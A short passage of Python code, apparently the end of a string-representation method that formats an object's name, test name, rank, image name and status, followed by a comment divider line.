return "%s , (%s=%s). IMG=%s. status=%s" %(self.name,self.test_name,self.rank,self.img_name,self.status)
#-------------------------------------------------------------------------------
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.